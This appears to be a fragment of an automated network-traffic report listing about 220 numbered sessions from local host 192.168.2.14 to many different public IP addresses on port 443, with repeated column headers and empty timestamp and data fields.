                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21644192.168.2.1449974133.166.207.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21645192.168.2.1456630100.31.209.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21646192.168.2.144451089.7.246.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21647192.168.2.1446624161.221.255.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21648192.168.2.1440682136.218.185.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21649192.168.2.1452800177.184.223.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21650192.168.2.1448884104.164.237.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21651192.168.2.1452950211.93.252.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21652192.168.2.1452484119.92.213.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21653192.168.2.143940657.31.43.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21654192.168.2.1439562205.235.63.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21655192.168.2.145880223.58.86.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21656192.168.2.1436098205.134.4.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21657192.168.2.145596636.59.136.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21658192.168.2.1442202193.247.70.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21659192.168.2.145486012.229.23.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21660192.168.2.1454278144.22.50.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21661192.168.2.1436768173.17.179.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21662192.168.2.145361657.131.68.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21663192.168.2.1457344118.206.202.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21664192.168.2.1436308105.76.58.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21665192.168.2.1460012104.186.117.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21666192.168.2.1445622137.210.52.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21667192.168.2.143574287.74.57.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21668192.168.2.1453314124.124.13.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21669192.168.2.1443464185.17.169.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21670192.168.2.14547502.153.108.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21671192.168.2.1442226171.153.150.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21672192.168.2.1447324203.57.60.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21673192.168.2.1453072112.10.197.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21674192.168.2.14355568.237.214.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21675192.168.2.1442992201.150.121.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21676192.168.2.1456964119.165.113.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21677192.168.2.14415664.251.97.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21678192.168.2.1442668109.85.201.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21679192.168.2.1460006120.246.188.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21680192.168.2.1450162196.58.44.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21681192.168.2.1441748218.147.114.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21682192.168.2.1456224176.147.61.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21683192.168.2.14462984.247.175.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21684192.168.2.145169432.103.231.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21685192.168.2.144166894.76.179.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21686192.168.2.1444292142.168.83.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21687192.168.2.144383046.174.3.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21688192.168.2.1454742168.75.81.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21689192.168.2.145013036.207.177.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21690192.168.2.1434116140.190.127.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21691192.168.2.1455736119.125.6.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21692192.168.2.1435278129.64.121.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21693192.168.2.1444938223.6.57.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21694192.168.2.145775685.83.59.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21695192.168.2.1440514117.86.102.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21696192.168.2.144599214.226.32.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21697192.168.2.1433212223.183.34.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21698192.168.2.145310224.168.140.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21699192.168.2.146071060.185.80.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21700192.168.2.1447730167.203.30.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21701192.168.2.1437654184.215.11.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21702192.168.2.1440724107.134.94.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21703192.168.2.145312813.125.180.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21704192.168.2.1434036192.25.28.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21705192.168.2.145559438.204.255.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21706192.168.2.1444716175.22.45.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21707192.168.2.1433078191.201.23.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21708192.168.2.1436424117.254.52.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21709192.168.2.1459514122.33.163.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21710192.168.2.1444138104.76.3.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21711192.168.2.1440612208.147.37.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21712192.168.2.143453087.3.52.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21713192.168.2.145255632.116.69.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21714192.168.2.1443080137.6.84.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21715192.168.2.1453688220.81.80.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21716192.168.2.145463688.17.3.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21717192.168.2.1448534130.18.24.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21718192.168.2.1434910132.37.211.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21719192.168.2.1451976100.221.219.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21720192.168.2.145282294.231.162.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21721192.168.2.1448020177.50.23.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21722192.168.2.14443969.247.148.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21723192.168.2.14539842.197.242.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21724192.168.2.1453848170.32.192.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21725192.168.2.144793624.120.54.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21726192.168.2.144373239.210.92.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21727192.168.2.1438364212.183.180.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21728192.168.2.1448434188.121.129.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21729192.168.2.143790232.146.252.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21730192.168.2.143513276.217.133.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21731192.168.2.1457440187.123.123.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21732192.168.2.146080836.13.224.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21733192.168.2.1443914199.86.224.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21734192.168.2.1442118206.196.10.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21735192.168.2.144261691.171.185.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21736192.168.2.1439434101.204.33.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21737192.168.2.1438038198.109.42.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21738192.168.2.143821482.90.156.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21739192.168.2.1446432209.19.216.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21740192.168.2.1453602165.56.118.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21741192.168.2.144645084.217.178.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21742192.168.2.1460258177.240.3.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21743192.168.2.143686282.53.249.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21744192.168.2.145849047.143.205.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21745192.168.2.1439518150.92.190.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21746192.168.2.143783279.85.93.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21747192.168.2.144432497.216.228.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21748192.168.2.1456882183.237.57.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21749192.168.2.1438534133.227.178.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21750192.168.2.1434430181.129.226.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21751192.168.2.144632817.134.252.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21752192.168.2.14333045.70.236.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21753192.168.2.1453468221.39.220.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21754192.168.2.145548271.146.127.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21755192.168.2.143554879.137.226.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21756192.168.2.143339488.95.164.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21757192.168.2.1449694213.55.201.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21758192.168.2.144289658.49.236.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21759192.168.2.145654477.63.244.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21760192.168.2.1444576106.74.206.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21761192.168.2.1446300217.234.21.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21762192.168.2.144013476.129.92.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21763192.168.2.143441438.185.100.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21764192.168.2.1460098191.251.15.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21765192.168.2.145421680.129.49.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21766192.168.2.1433192111.119.36.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21767192.168.2.1434842102.138.210.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21768192.168.2.14538442.105.208.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21769192.168.2.145741831.18.59.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21770192.168.2.145405451.248.211.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21771192.168.2.144889092.175.4.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21772192.168.2.1460498142.112.212.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21773192.168.2.1439512203.219.208.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21774192.168.2.1438516138.191.160.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21775192.168.2.1438946115.159.179.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21776192.168.2.144872439.152.209.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21777192.168.2.145252853.171.38.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21778192.168.2.1443040124.247.97.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21779192.168.2.1457322106.62.163.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21780192.168.2.1437472104.151.143.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21781192.168.2.145461072.177.205.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21782192.168.2.1433808142.124.134.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21783192.168.2.1441958170.186.161.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21784192.168.2.144950854.92.211.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21785192.168.2.1435048150.95.180.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21786192.168.2.144980062.209.72.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21787192.168.2.144154496.9.179.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21788192.168.2.1443602121.65.224.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21789192.168.2.143725236.44.189.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21790192.168.2.1435610198.180.98.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21791192.168.2.1433480113.71.45.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21792192.168.2.1433518195.246.139.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21793192.168.2.1451394191.43.151.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21794192.168.2.145803287.254.55.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21795192.168.2.144031088.143.197.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21796192.168.2.1444872136.109.168.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21797192.168.2.144072285.221.204.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21798192.168.2.143603844.30.125.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21799192.168.2.144655040.6.122.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21800192.168.2.1440570181.28.62.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21801192.168.2.144589212.112.153.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21802192.168.2.1446700202.84.68.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21803192.168.2.1454824205.139.100.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21804192.168.2.1454422216.161.165.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21805192.168.2.1444732148.211.128.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21806192.168.2.144730299.177.237.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21807192.168.2.1450716106.66.206.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21808192.168.2.1436592205.97.178.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21809192.168.2.144994675.177.170.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21810192.168.2.144098090.127.190.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21811192.168.2.145655643.80.27.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21812192.168.2.145911067.29.240.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21813192.168.2.1432950154.128.65.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21814192.168.2.145424686.241.247.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21815192.168.2.1438592192.208.238.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21816192.168.2.145189013.249.174.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21817192.168.2.1438716208.166.115.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21818192.168.2.1441092177.80.19.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21819192.168.2.143996890.15.165.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21820192.168.2.1436858211.10.205.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21821192.168.2.144312225.27.206.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21822192.168.2.1460944144.215.3.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21823192.168.2.1436802222.222.235.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21824192.168.2.146026050.239.242.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21825192.168.2.1447104158.253.34.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21826192.168.2.1439682115.34.125.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21827192.168.2.144173632.5.95.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21828192.168.2.1434698175.212.81.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21829192.168.2.1450330138.125.51.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21830192.168.2.145773042.200.153.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21831192.168.2.1453202120.200.70.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21832192.168.2.144778680.253.120.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21833192.168.2.144772234.240.197.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21834192.168.2.1452138148.147.245.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21835192.168.2.1446008150.127.78.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21836192.168.2.1439176139.17.67.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21837192.168.2.145265873.173.0.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21838192.168.2.1450026101.25.66.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21839192.168.2.144044619.34.157.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21840192.168.2.1456366202.155.73.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21841192.168.2.1453128145.132.179.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21842192.168.2.1433564135.74.192.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21843192.168.2.144246854.104.6.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21844192.168.2.1439056198.188.198.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21845192.168.2.1460648132.236.116.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21846192.168.2.1441542134.137.16.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21847192.168.2.1459630124.246.145.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21848192.168.2.1445240185.235.8.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21849192.168.2.1435616218.236.240.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21850192.168.2.145953038.22.142.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21851192.168.2.1433812156.61.122.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21852192.168.2.145431261.132.9.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21853192.168.2.1441692106.99.28.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21854192.168.2.1460726186.251.149.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21855192.168.2.145967435.239.210.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21856192.168.2.1441512134.251.160.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21857192.168.2.143599496.111.208.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21858192.168.2.145983464.86.117.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21859192.168.2.1442374158.216.157.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21860192.168.2.144524878.151.118.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21861192.168.2.143824075.217.175.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21862192.168.2.143607482.245.84.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21863192.168.2.1442588136.100.108.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21864192.168.2.1439952171.176.81.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
